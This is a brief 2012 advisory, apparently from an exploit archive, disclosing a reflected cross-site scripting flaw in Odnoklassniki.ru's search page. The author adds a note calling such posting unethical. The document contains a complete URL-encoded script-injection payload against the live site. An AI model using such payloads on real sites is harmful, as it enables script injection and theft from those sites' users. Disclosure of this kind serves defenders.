Reason?
I will not post any bugs in the future, because I changed my views on this and now consider it to be unethical.
# Date: 15.04.2012
# Author: Sony and Flexxpoint
# Web Browser: Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
# Flexxpoint Blog: http://flexxpoint.blogspot.com/
# PoC:
http://st2tea.blogspot.com/2012/04/odnoklassnikiru-cross-site-scripting.html
..................................................................
Well, we have cross-site scripting on Odnoklassniki.ru:
http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E
or
http://codepad.org/kKjrrn76